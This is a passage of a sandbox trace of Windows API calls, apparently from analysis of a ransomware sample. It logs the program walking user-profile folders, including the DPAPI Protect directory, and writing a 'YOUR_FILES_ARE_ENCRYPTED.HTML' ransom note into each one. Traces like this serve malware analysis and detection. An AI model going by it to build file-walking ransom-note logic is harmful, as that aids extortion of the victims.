"c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0171.086] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0171.088] CloseHandle (hObject=0x590) returned 1 [0171.088] GetProcessHeap () returned 0x270000 [0171.089] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75ba010 | out: hHeap=0x270000) returned 1 [0171.089] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0171.089] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 97 [0171.089] GetProcessHeap () returned 0x270000 [0171.090] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75ba010 [0171.090] lstrcpyW (in: lpString1=0x75ba010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet 
Explorer\\Quick Launch\\User Pinned\\TaskBar" [0171.090] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0171.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, 
nFileSizeLow=0xd3, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.105] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0171.105] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.105] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.105] lstrlenW (lpString=".ini") returned 4 [0171.105] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a01436b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0171.105] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 119 [0171.105] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.105] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0171.105] lstrlenW (lpString=".lnk") returned 4 [0171.105] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd34e2948, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0171.106] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0171.106] lstrcmpW (lpString1="Windows Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.106] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0171.106] lstrlenW (lpString=".lnk") returned 4 [0171.106] PathFindExtensionW (pszPath="Windows Explorer.lnk") returned=".lnk" [0171.106] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8942d555, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0171.106] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0171.106] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.106] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0171.106] lstrlenW (lpString=".lnk") returned 4 [0171.106] PathFindExtensionW (pszPath="Windows Media Player.lnk") returned=".lnk" [0171.106] FindNextFileW (in: 
hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8942d555, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5eb, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0171.106] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0171.108] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0171.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0171.111] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0171.114] CloseHandle (hObject=0x590) returned 1 [0171.119] GetProcessHeap () returned 0x270000 [0171.121] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75ba010 | out: hHeap=0x270000) returned 1 [0171.121] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0171.121] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0171.121] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0171.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0171.125] WriteFile (in: hFile=0x5dc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0171.128] CloseHandle (hObject=0x5dc) returned 1 [0171.128] GetProcessHeap () returned 0x270000 [0171.129] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0171.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd371ddec, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0171.130] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0171.130] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.130] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0171.130] lstrlenW (lpString=".lnk") returned 4 [0171.130] PathFindExtensionW (pszPath="Window Switcher.lnk") returned=".lnk" [0171.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd371ddec, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x60, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0171.130] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.130] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0171.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.131] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, 
lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.134] CloseHandle (hObject=0x58c) returned 1 [0171.134] GetProcessHeap () returned 0x270000 [0171.135] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.135] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0171.135] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.135] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0171.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.136] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.138] CloseHandle (hObject=0x5fc) returned 1 [0171.138] GetProcessHeap () returned 0x270000 [0171.139] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | 
out: hHeap=0x270000) returned 1 [0171.139] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Protect", cAlternateFileName="")) returned 1 [0171.139] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect") returned 54 [0171.139] GetProcessHeap () returned 0x270000 [0171.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.140] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect" [0171.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*" [0171.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 
[0171.140] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.140] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0171.140] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0171.140] lstrcmpW (lpString1="CREDHIST", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.140] PathFindExtensionW (pszPath="CREDHIST") returned="" [0171.140] lstrlenW (lpString="") returned 0 [0171.140] PathFindExtensionW (pszPath="CREDHIST") returned="" [0171.140] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", 
cAlternateFileName="S-1-5-~1")) returned 1 [0171.140] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned 99 [0171.141] GetProcessHeap () returned 0x270000 [0171.141] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.141] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" [0171.141] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*" [0171.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, 
ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8276c76d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="16d9487c-eb21-48f6-b767-53160cf7974d", cAlternateFileName="16D948~1")) returned 1 [0171.147] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\16d9487c-eb21-48f6-b767-53160cf7974d") returned 136 [0171.147] lstrcmpW (lpString1="16d9487c-eb21-48f6-b767-53160cf7974d", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.147] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0171.147] lstrlenW (lpString="") returned 0 [0171.147] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0171.147] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\Preferred") returned 109 [0171.147] lstrcmpW (lpString1="Preferred", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.147] PathFindExtensionW (pszPath="Preferred") returned="" [0171.147] lstrlenW (lpString="") returned 0 [0171.147] PathFindExtensionW (pszPath="Preferred") returned="" [0171.147] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbca40720, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca40720, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0171.147] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.149] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, 